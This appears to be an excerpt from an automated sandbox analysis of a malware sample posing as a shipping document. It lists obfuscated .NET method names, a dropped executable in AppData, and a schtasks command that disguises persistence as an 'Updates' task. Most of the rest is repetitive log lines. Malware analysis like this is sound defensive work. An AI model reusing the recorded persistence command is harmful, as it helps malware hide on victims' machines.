                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, p5ajujJIx6NEAP6Ta6.csHigh entropy of concatenated method names: 'rkqb4IoryD', 'eYfbA31FKt', 'ToString', 's7jbkeyra9', 'tDUbhuPWCQ', 'UrAbvd7bWf', 'k3jb01NNMp', 'KqWbov5uyA', 'z8KbOqKPJx', 'hpJbMsvIPM'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, AIcHRChuVALeienrmr.csHigh entropy of concatenated method names: 'Dispose', 'uuDcstGlte', 'p9VwSZhBfN', 'EMSFr8Cs7e', 'iw1cr5n7Yf', 'BCUczaaFyU', 'ProcessDialogKey', 'iQrwiDRIHl', 'zNrwcKQTNf', 'tK1wwrqKBt'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, yWdfM2w0nSc2dxPWqK.csHigh entropy of concatenated method names: 'jH2mNUWV9', 'RBDekMWaE', 'F23jSWmO9', 'zdqBaT7H4', 'WE06gIB6L', 'iPSUWXgfm', 'OB4pjO0apGFRSAGWu9', 'cdhHjmmAfronYpLDBj', 'uofEWCHUe', 'Wweug1gSt'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, YqKBtUr6skMlv0JZ6D.csHigh entropy of concatenated method names: 'gafuvwvXpo', 'pZeu0Y1LQF', 'QlSuoVcxLn', 'LoJuO9aeKk', 'ldcufHJLfP', 'py3uMmnr1y', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, It8BTICMxJrvOAxTA5.csHigh entropy of concatenated method names: 'TCxOk5mtC5', 'rdAOvhfFwE', 'chEOopyvyJ', 'xWXort2OLP', 'di9oztZTme', 'RLdOitjrMN', 'WlYOcK2PjC', 'acVOwZ6L9G', 'JjgO2Rq589', 'dDDORYwps7'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, GW9cD1MmeOsIOgrcql.csHigh entropy of concatenated method names: 'st22GFDoKU', 'YQ82kis2ir', 'ytg2hjIxyL', 'Xle2vSVIHM', 'X9W20Hie0N', 'vtT2ourvjS', 'R8G2Oupr11', 'qbQ2MdETRm', 'dAD28S8tNQ', 'bMj24aepcC'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, KU8ZYEciwjsgRZYTR88.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'S19up8nqxo', 'k0quPk3Ixw', 'kDTuxxkV9V', 'jIiuKKTlZ3', 'wI4uLhDZ9e', 'Q83uHS5wg2', 'W9CuJev2TD'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, MXmGpj5MV9uDtGlteo.csHigh entropy of concatenated method names: 'VoDfYLYPCD', 'evufbPvr8E', 'iSIff3pPaQ', 'MvCfDNBSRe', 'kZ6f7PcM7N', 'yo8fQ4tb5c', 'Dispose', 'nkGEkKOOUf', 'BTLEhaxZxd', 'siyEvBejXP'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, iyFcKGg9tCppqGG5IB.csHigh entropy of concatenated method names: 'YPYhKoeWJX', 'C3xhL0k6ZA', 'PnZhHZaXrM', 'dMkhJooWLH', 'INmh3Xo95l', 'vLehIe3asP', 'P82h5mjbhW', 'cvxhNXbHvi', 'CX6hsOPlfk', 'miqhrr6hbZ'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, MoqyMhKfR5ZLSgV4xq.csHigh entropy of concatenated method names: 'GDIYqhjdbs', 'iBAYPYG5MT', 'CNZYKdlmr9', 'tmOYLDYbpw', 'X7RYSwAxUA', 'MPHYnJcbq7', 'I3RYZKBBcQ', 'nPvYdXyHFq', 'WZKY1BaUYO', 'rOnYCQLft6'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, YFlHc9FRLodglFhil2.csHigh entropy of concatenated method names: 'CfHoGKJPAp', 'Is2ohx9NjZ', 'YSYo0cBv0r', 'zanoOfxncP', 'vbuoMJn2jp', 'b8b03iXl7I', 'Lpt0IwjhPk', 'lY905vtxKg', 'KFm0NknFcH', 'wNA0sJeaKM'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, Ft1xorcR9nfR3PLHEV2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PpY9fyOqZC', 'reo9u2y3Vp', 'c2R9DhsbFm', 'iSn99eAKWn', 'O1997qWdU8', 'OlP9tXJDZa', 'm3T9Qn6Wyb'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, LTQ4HuccTwyWsx1plV0.csHigh entropy of concatenated method names: 'KapureQ5qN', 'B5auzAZFtv', 'Es1Di1Mf3e', 'S01DcEYaVL', 'WyIDwYYTrL', 'lxPD2ZcUZE', 'BfhDRydOMO', 'H3JDGyQiIk', 'YU6DkfTK7u', 'wygDhwDQHj'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, Tkt4wHlmAKfXdWtNJ2.csHigh entropy of concatenated method names: 'pFsOXCkO2M', 'kvdOyVleBR', 'sucOmc6y86', 'SJROedhrAF', 'RwqOT9kFio', 'aEVOjQrC0X', 'lFpOB0SH6O', 'OryOgUGw3s', 'lFrO6x3DB7', 'CvlOUyBWIb'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, hhLLZuzZxj1m3Zu6xC.csHigh entropy of concatenated method names: 'OBAujm0FlY', 'XdUugdZTyd', 'U12u6HGa6n', 'NdmuFWyiDv', 'XgkuS1Gl0C', 'XGvuZ3H4pw', 'go1ud6txl9', 'A6guQkOSZt', 'tZYuXRHFjo', 'hFAuyGth4v'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, ej4Qr1IUJDvF9DuJ0E.csHigh entropy of concatenated method names: 'iL6bNRoADV', 'X26br5ieKL', 'MjjEi151OW', 'OpUEcNC4yP', 'kJ9bpKkIFm', 'KJnbP6PIu7', 'y3YbxrBuXJ', 'bwtbKpOjah', 'IRobLuBiWs', 'vsrbHUIk72'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, YDRIHlsmNrKQTNfDK1.csHigh entropy of concatenated method names: 'gg9fFTiwm7', 'VoifSbhf42', 'Ceyfns06jS', 'irPfZvtvK4', 'vcafdZPacO', 'N3Jf1NmZOn', 'yEvfCd7IYd', 'dBDfaliCra', 'H7LfllbkJq', 'tpGfqEZFKn'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, CX40lb61IQjMgJJ9Xp.csHigh entropy of concatenated method names: 'xMWvee6ruB', 'bZxvjSb03C', 'UxfvgNu6Gx', 'pvfv6lyDuv', 'HksvYYxiNC', 'PJivVbfkA5', 'HG4vbwM19g', 'IUAvE1jlDM', 'C0kvfGVI7n', 'ORFvuhxk0G'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, DYR5mgvByZ5AqfKXPJ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IOawsaFIyF', 'dLHwrlw9GX', 'jhkwzZ79BX', 'pvZ2ij9qDD', 'Y3a2cKeTVs', 'Xfr2wiwFM7', 'tmq22OPiPx', 'iNcxj3x8AScqIKwUgyl'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, LecK7pRFDoRvlOpnsK.csHigh entropy of concatenated method names: 'EaocOyFcKG', 'utCcMppqGG', 'q1Ic4QjMgJ', 'T9XcApfynF', 'xZvcYVgrFl', 'Sc9cVRLodg', 'FW9Lm9IobJ7wAFaKKq', 'x48a31vlaHMCGDKOEn', 'iy3ccHRZar', 'UkJc2xqDNq'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, MVTp3tHWwbTqXbrBQ6.csHigh entropy of concatenated method names: 'ToString', 'gRkVpTPjyW', 'H3AVShmVJT', 'NL2VnhFcHT', 'mXVVZIXHgT', 'P8SVd89hXI', 'mADV1PDrng', 'MaVVCj4Nhe', 'M8yVakO6IR', 'GepVlEXhjZ'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, synFdbUAAYG4FXZvVg.csHigh entropy of concatenated method names: 'TML0TZOIXD', 'c8a0BauMu1', 'eEEvnYUwhi', 'g7bvZwoxMm', 'AqYvdEj7Uw', 'nXDv1gokyc', 'axTvC3nNSB', 'J1yvaHU9xI', 'XeCvlV2tbP', 'M7dvqtrdxt'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, WKGKBnxuD29SR6iMy0.csHigh entropy of concatenated method names: 'glFWge1w8H', 'TRcW6DDgEM', 'noyWFGFMuG', 'iv0WSoYFoi', 'o5eWZM7tDq', 'RNBWdHHhej', 'V81WCojX8U', 'pZsWanDcfL', 'nbIWqRBHaV', 'v6tWpRcuPP'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, p5ajujJIx6NEAP6Ta6.csHigh entropy of concatenated method names: 'rkqb4IoryD', 'eYfbA31FKt', 'ToString', 's7jbkeyra9', 'tDUbhuPWCQ', 'UrAbvd7bWf', 'k3jb01NNMp', 'KqWbov5uyA', 'z8KbOqKPJx', 'hpJbMsvIPM'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, AIcHRChuVALeienrmr.csHigh entropy of concatenated method names: 'Dispose', 'uuDcstGlte', 'p9VwSZhBfN', 'EMSFr8Cs7e', 'iw1cr5n7Yf', 'BCUczaaFyU', 'ProcessDialogKey', 'iQrwiDRIHl', 'zNrwcKQTNf', 'tK1wwrqKBt'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, yWdfM2w0nSc2dxPWqK.csHigh entropy of concatenated method names: 'jH2mNUWV9', 'RBDekMWaE', 'F23jSWmO9', 'zdqBaT7H4', 'WE06gIB6L', 'iPSUWXgfm', 'OB4pjO0apGFRSAGWu9', 'cdhHjmmAfronYpLDBj', 'uofEWCHUe', 'Wweug1gSt'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, YqKBtUr6skMlv0JZ6D.csHigh entropy of concatenated method names: 'gafuvwvXpo', 'pZeu0Y1LQF', 'QlSuoVcxLn', 'LoJuO9aeKk', 'ldcufHJLfP', 'py3uMmnr1y', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, It8BTICMxJrvOAxTA5.csHigh entropy of concatenated method names: 'TCxOk5mtC5', 'rdAOvhfFwE', 'chEOopyvyJ', 'xWXort2OLP', 'di9oztZTme', 'RLdOitjrMN', 'WlYOcK2PjC', 'acVOwZ6L9G', 'JjgO2Rq589', 'dDDORYwps7'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, GW9cD1MmeOsIOgrcql.csHigh entropy of concatenated method names: 'st22GFDoKU', 'YQ82kis2ir', 'ytg2hjIxyL', 'Xle2vSVIHM', 'X9W20Hie0N', 'vtT2ourvjS', 'R8G2Oupr11', 'qbQ2MdETRm', 'dAD28S8tNQ', 'bMj24aepcC'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, KU8ZYEciwjsgRZYTR88.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'S19up8nqxo', 'k0quPk3Ixw', 'kDTuxxkV9V', 'jIiuKKTlZ3', 'wI4uLhDZ9e', 'Q83uHS5wg2', 'W9CuJev2TD'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, MXmGpj5MV9uDtGlteo.csHigh entropy of concatenated method names: 'VoDfYLYPCD', 'evufbPvr8E', 'iSIff3pPaQ', 'MvCfDNBSRe', 'kZ6f7PcM7N', 'yo8fQ4tb5c', 'Dispose', 'nkGEkKOOUf', 'BTLEhaxZxd', 'siyEvBejXP'
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeFile created: C:\Users\user\AppData\Roaming\uyDicX.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
